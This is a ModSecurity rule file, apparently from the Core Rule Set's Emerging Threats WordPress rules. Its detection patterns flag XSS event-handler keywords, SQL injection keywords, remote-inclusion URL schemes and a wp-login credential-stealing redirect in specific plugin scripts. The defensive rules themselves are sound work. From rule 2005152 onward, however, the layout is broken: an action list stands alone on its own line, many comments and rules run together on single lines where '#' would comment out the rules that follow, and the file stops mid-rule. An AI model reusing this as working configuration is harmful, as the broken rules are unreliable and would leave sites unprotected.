ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. 
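# ---------------------------------------------------------------
#
# This ruleset was created by Trustwave SpiderLabs Research Team and includes data from:
#
# http://www.emergingthreats.net/
#

# Gate rule (2000005): when REQUEST_FILENAME, after the listed
# transformations, contains none of the phrases in
# modsecurity_46_slr_et_wordpress.data, processing jumps to the marker
# END_SLR_ET_WORDPRESS_RULES without logging. The data file and the marker
# are not visible in this part of the file.
SecRule REQUEST_FILENAME "!@pmFromFile modsecurity_46_slr_et_wordpress.data" "id:'2000005',phase:2,nolog,pass,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,skipAfter:END_SLR_ET_WORDPRESS_RULES"

# (2011256) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS FireStats window-add-excluded-ip.php Cross Site Scripting Attempt
#
# Two-link chain: the request line contains the plugin script path, and the
# value of the request parameter "edit" contains a script/event-handler
# keyword.
# FIX: ARGS:edit holds only the parameter value, never the "edit=" prefix,
# so the previous pattern (which began with edit\x3d.+) could match only
# when the value itself contained a second "edit=". The name prefix is
# dropped and the keyword alternation is applied to the value directly.
# NOTE(review): the bare keyword "script" also matches inside ordinary
# words such as "description"; watch the audit log for false positives.
SecRule REQUEST_LINE "@contains /wp-content/plugins/firestats/php/window-add-excluded-ip.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011256,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS FireStats window-add-excluded-ip.php Cross Site Scripting Attempt',tag:'web-application-attack'"
SecRule ARGS:edit "(?i:(script|onmouse[a-z]+|onkey[a-z]+|onload|onunload|ondragdrop|onblur|onfocus|onclick|ondblclick|onsubmit|onreset|onselect|onchange|style\x3D))" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS FireStats window-add-excluded-ip.php Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'"

# (2011257) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS FireStats window-add-excluded-url.php Cross Site Scripting Attempt
#
# Same chain as 2011256 for window-add-excluded-url.php.
# FIX: the "edit=" prefix is dropped from the pattern because ARGS:edit
# holds only the parameter value.
SecRule REQUEST_LINE "@contains /wp-content/plugins/firestats/php/window-add-excluded-url.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011257,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS FireStats window-add-excluded-url.php Cross Site Scripting Attempt',tag:'web-application-attack'"
SecRule ARGS:edit "(?i:(script|onmouse[a-z]+|onkey[a-z]+|onload|onunload|ondragdrop|onblur|onfocus|onclick|ondblclick|onsubmit|onreset|onselect|onchange|style\x3D))" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS FireStats window-add-excluded-url.php Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'"

# (2011258) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS FireStats window-new-edit-site.php Cross Site Scripting Attempt
#
# Same chain for window-new-edit-site.php, inspecting the "site_id"
# parameter.
# FIX: the "site_id=" prefix is dropped from the pattern because
# ARGS:site_id holds only the parameter value.
SecRule REQUEST_LINE "@contains /wp-content/plugins/firestats/php/window-new-edit-site.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011258,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS FireStats window-new-edit-site.php Cross Site Scripting Attempt',tag:'web-application-attack'"
SecRule ARGS:site_id "(?i:(script|onmouse[a-z]+|onkey[a-z]+|onload|onunload|ondragdrop|onblur|onfocus|onclick|ondblclick|onsubmit|onreset|onselect|onchange|style\x3D))" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS FireStats window-new-edit-site.php Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'"

# (2005152) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS SpoonLabs Vivvo Article Management CMS (phpWordPress) SQL Injection Attempt -- show_webfeed.php wcHeadlines SELECT
#
# Chain: the request line contains /rss/show_webfeed.php and the value of
# the "wcHeadlines" parameter matches SELECT ... FROM (case-insensitive).
# The action list of the chained rule continues on the next line of this
# listing.
SecRule REQUEST_LINE "@contains /rss/show_webfeed.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005152,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS SpoonLabs Vivvo Article Management CMS (phpWordPress) SQL Injection Attempt -- show_webfeed.php wcHeadlines SELECT',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22282'"
SecRule ARGS:wcHeadlines "(?i:SELECT.+FROM)"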
"ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS SpoonLabs Vivvo Article Management CMS (phpWordPress) SQL Injection Attempt -- show_webfeed.php wcHeadlines SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2005153) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS SpoonLabs Vivvo Article Management CMS (phpWordPress) SQL Injection Attempt -- show_webfeed.php wcHeadlines UNION SELECT SecRule REQUEST_LINE "@contains /rss/show_webfeed.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005153,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS SpoonLabs Vivvo Article Management CMS (phpWordPress) SQL Injection Attempt -- show_webfeed.php wcHeadlines UNION SELECT',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22282'" SecRule ARGS:wcHeadlines "(?i:UNION\s+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS SpoonLabs Vivvo Article Management CMS (phpWordPress) SQL Injection Attempt -- show_webfeed.php wcHeadlines UNION SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2005155) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS SpoonLabs Vivvo Article Management CMS (phpWordPress) SQL Injection Attempt -- show_webfeed.php wcHeadlines INSERT SecRule REQUEST_LINE "@contains /rss/show_webfeed.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005155,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS SpoonLabs Vivvo Article Management CMS (phpWordPress) SQL Injection Attempt -- show_webfeed.php wcHeadlines INSERT',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22282'" SecRule ARGS:wcHeadlines "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS SpoonLabs Vivvo 
Article Management CMS (phpWordPress) SQL Injection Attempt -- show_webfeed.php wcHeadlines INSERT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2005154) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS SpoonLabs Vivvo Article Management CMS (phpWordPress) SQL Injection Attempt -- show_webfeed.php wcHeadlines DELETE SecRule REQUEST_LINE "@contains /rss/show_webfeed.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005154,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS SpoonLabs Vivvo Article Management CMS (phpWordPress) SQL Injection Attempt -- show_webfeed.php wcHeadlines DELETE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22282'" SecRule ARGS:wcHeadlines "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS SpoonLabs Vivvo Article Management CMS (phpWordPress) SQL Injection Attempt -- show_webfeed.php wcHeadlines DELETE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2005156) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS SpoonLabs Vivvo Article Management CMS (phpWordPress) SQL Injection Attempt -- show_webfeed.php wcHeadlines ASCII SecRule REQUEST_LINE "@contains /rss/show_webfeed.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005156,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS SpoonLabs Vivvo Article Management CMS (phpWordPress) SQL Injection Attempt -- show_webfeed.php wcHeadlines ASCII',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22282'" SecRule ARGS:wcHeadlines "(?i:ASCII\(.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS SpoonLabs Vivvo Article Management CMS (phpWordPress) SQL Injection Attempt -- show_webfeed.php wcHeadlines 
ASCII',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2005157) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS SpoonLabs Vivvo Article Management CMS (phpWordPress) SQL Injection Attempt -- show_webfeed.php wcHeadlines UPDATE SecRule REQUEST_LINE "@contains /rss/show_webfeed.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005157,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS SpoonLabs Vivvo Article Management CMS (phpWordPress) SQL Injection Attempt -- show_webfeed.php wcHeadlines UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22282'" SecRule ARGS:wcHeadlines "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS SpoonLabs Vivvo Article Management CMS (phpWordPress) SQL Injection Attempt -- show_webfeed.php wcHeadlines UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2003508) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Wordpress wp-login.php redirect_to credentials stealing attempt SecRule REQUEST_LINE "@contains /wp-login.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003508,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Wordpress wp-login.php redirect_to credentials stealing attempt',tag:'web-application-attack',tag:'url,www.inliniac.net/blog/?p=71'" SecRule QUERY_STRING|REQUEST_BODY "(?i:redirect_to=(ht|f)tps?\:\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Wordpress wp-login.php redirect_to credentials stealing attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2003685) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Wordpress Remote 
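# Inclusion Attempt -- wptable-button.php wpPATH
#
# Two-link chain: the request line contains /js/wptable-button.php and the
# value of the "wpPATH" parameter starts with a remote URL scheme
# (http, https, ftp, ftps or php, followed by ":/").
# FIX: ARGS:wpPATH holds only the parameter value, so the previous pattern,
# which required a literal "=" before the scheme, did not match a value
# that simply begins with the scheme. The "=" is replaced by a
# start-of-value anchor; optional leading whitespace is still allowed.
SecRule REQUEST_LINE "@contains /js/wptable-button.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003685,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Wordpress Remote Inclusion Attempt -- wptable-button.php wpPATH',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3824'"
SecRule ARGS:wpPATH "(?i:^\s*(https?|ftps?|php)\:\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Wordpress Remote Inclusion Attempt -- wptable-button.php wpPATH',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'"

# (2003686) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Wordpress Remote Inclusion Attempt -- wordtube-button.php wpPATH
#
# Same chain as 2003685 for /wordtube-button.php.
# FIX: the pattern is anchored at the start of the value instead of
# requiring a literal "=", because ARGS:wpPATH holds only the value.
SecRule REQUEST_LINE "@contains /wordtube-button.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003686,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Wordpress Remote Inclusion Attempt -- wordtube-button.php wpPATH',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3825'"
SecRule ARGS:wpPATH "(?i:^\s*(https?|ftps?|php)\:\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Wordpress Remote Inclusion Attempt -- wordtube-button.php wpPATH',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'"

# (2003885) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress XSS Attempt -- sidebar.php
#
# Two-link chain: the request line contains /sidebar.php and the query
# string or request body contains an opening and a closing script tag.
# FIX: QUERY_STRING and REQUEST_BODY are inspected as raw, undecoded data,
# and the t: actions on the chain starter apply to its own REQUEST_LINE
# check only. The chained rule now decodes its input itself, so that
# percent-encoded and entity-encoded markup is normalised before matching.
# NOTE(review): @contains /sidebar.php matches any request line holding
# that string, not only the WordPress theme file.
SecRule REQUEST_LINE "@contains /sidebar.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003885,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress XSS Attempt -- sidebar.php',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/467360/100/0/threaded'"
SecRule QUERY_STRING|REQUEST_BODY "(?i:<?(java|vb)?script>?.*<.+\/script>?)" "t:none,t:urlDecodeUni,t:htmlEntityDecode,ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress XSS Attempt -- sidebar.php',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'"

# (2004011) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- admin-ajax.php cookie SELECT
#
# Two-link chain: the request line contains /wp-admin/admin-ajax.php and
# the value of the request parameter named "cookie" matches SELECT ... FROM
# (case-insensitive). ARGS:cookie is a request parameter, not the Cookie
# request header.
SecRule REQUEST_LINE "@contains /wp-admin/admin-ajax.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004011,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- admin-ajax.php cookie SELECT',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/24076'"
SecRule ARGS:cookie "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- admin-ajax.php cookie SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'"

# (2004012) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- admin-ajax.php cookie UNION SELECT
#
# Same chain as 2004011; the "cookie" parameter value must contain UNION
# followed by whitespace and SELECT (case-insensitive).
SecRule REQUEST_LINE "@contains /wp-admin/admin-ajax.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004012,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- admin-ajax.php cookie UNION SELECT',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/24076'"
SecRule ARGS:cookie "(?i:UNION\s+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- admin-ajax.php cookie UNION SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'"

# (2004013) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress SQL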
Injection Attempt -- admin-ajax.php cookie INSERT SecRule REQUEST_LINE "@contains /wp-admin/admin-ajax.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004013,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- admin-ajax.php cookie INSERT',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/24076'" SecRule ARGS:cookie "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- admin-ajax.php cookie INSERT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2004014) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- admin-ajax.php cookie DELETE SecRule REQUEST_LINE "@contains /wp-admin/admin-ajax.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004014,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- admin-ajax.php cookie DELETE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/24076'" SecRule ARGS:cookie "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- admin-ajax.php cookie DELETE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2004015) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- admin-ajax.php cookie ASCII SecRule REQUEST_LINE "@contains /wp-admin/admin-ajax.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004015,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- admin-ajax.php cookie 
ASCII',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/24076'" SecRule ARGS:cookie "(?i:ASCII\(.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- admin-ajax.php cookie ASCII',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2004016) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- admin-ajax.php cookie UPDATE SecRule REQUEST_LINE "@contains /wp-admin/admin-ajax.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004016,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- admin-ajax.php cookie UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/24076'" SecRule ARGS:cookie "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- admin-ajax.php cookie UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2004403) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- admin-functions.php SELECT SecRule REQUEST_LINE "@contains /wp-admin/admin-functions.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004403,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- admin-functions.php SELECT',tag:'web-application-attack',tag:'url,www.secunia.com/advisories/24566'" SecRule QUERY_STRING|REQUEST_BODY "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- admin-functions.php SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2004404) 
SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- admin-functions.php UNION SELECT SecRule REQUEST_LINE "@contains /wp-admin/admin-functions.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004404,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- admin-functions.php UNION SELECT',tag:'web-application-attack',tag:'url,www.secunia.com/advisories/24566'" SecRule QUERY_STRING|REQUEST_BODY "(?i:UNION\s+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- admin-functions.php UNION SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2004405) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- admin-functions.php INSERT SecRule REQUEST_LINE "@contains /wp-admin/admin-functions.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004405,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- admin-functions.php INSERT',tag:'web-application-attack',tag:'url,www.secunia.com/advisories/24566'" SecRule QUERY_STRING|REQUEST_BODY "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- admin-functions.php INSERT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2004406) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- admin-functions.php DELETE SecRule REQUEST_LINE "@contains /wp-admin/admin-functions.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004406,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS 
WordPress SQL Injection Attempt -- admin-functions.php DELETE',tag:'web-application-attack',tag:'url,www.secunia.com/advisories/24566'" SecRule QUERY_STRING|REQUEST_BODY "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- admin-functions.php DELETE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2004407) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- admin-functions.php ASCII SecRule REQUEST_LINE "@contains /wp-admin/admin-functions.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004407,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- admin-functions.php ASCII',tag:'web-application-attack',tag:'url,www.secunia.com/advisories/24566'" SecRule QUERY_STRING|REQUEST_BODY "(?i:ASCII\(.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- admin-functions.php ASCII',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2004408) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- admin-functions.php UPDATE SecRule REQUEST_LINE "@contains /wp-admin/admin-functions.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004408,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- admin-functions.php UPDATE',tag:'web-application-attack',tag:'url,www.secunia.com/advisories/24566'" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- admin-functions.php 
UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2004654) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Wordpress 2.2 SQL Injection Attempt -- xmlrpc.php SELECT SecRule REQUEST_LINE "@contains /xmlrpc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004654,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Wordpress 2.2 SQL Injection Attempt -- xmlrpc.php SELECT',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/4039'" SecRule QUERY_STRING|REQUEST_BODY "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Wordpress 2.2 SQL Injection Attempt -- xmlrpc.php SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2004655) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Wordpress 2.2 SQL Injection Attempt -- xmlrpc.php UNION SELECT SecRule REQUEST_LINE "@contains /xmlrpc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004655,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Wordpress 2.2 SQL Injection Attempt -- xmlrpc.php UNION SELECT',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/4039'" SecRule QUERY_STRING|REQUEST_BODY "(?i:UNION\s+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Wordpress 2.2 SQL Injection Attempt -- xmlrpc.php UNION SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2004656) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Wordpress 2.2 SQL Injection Attempt -- xmlrpc.php INSERT SecRule REQUEST_LINE "@contains /xmlrpc.php" 
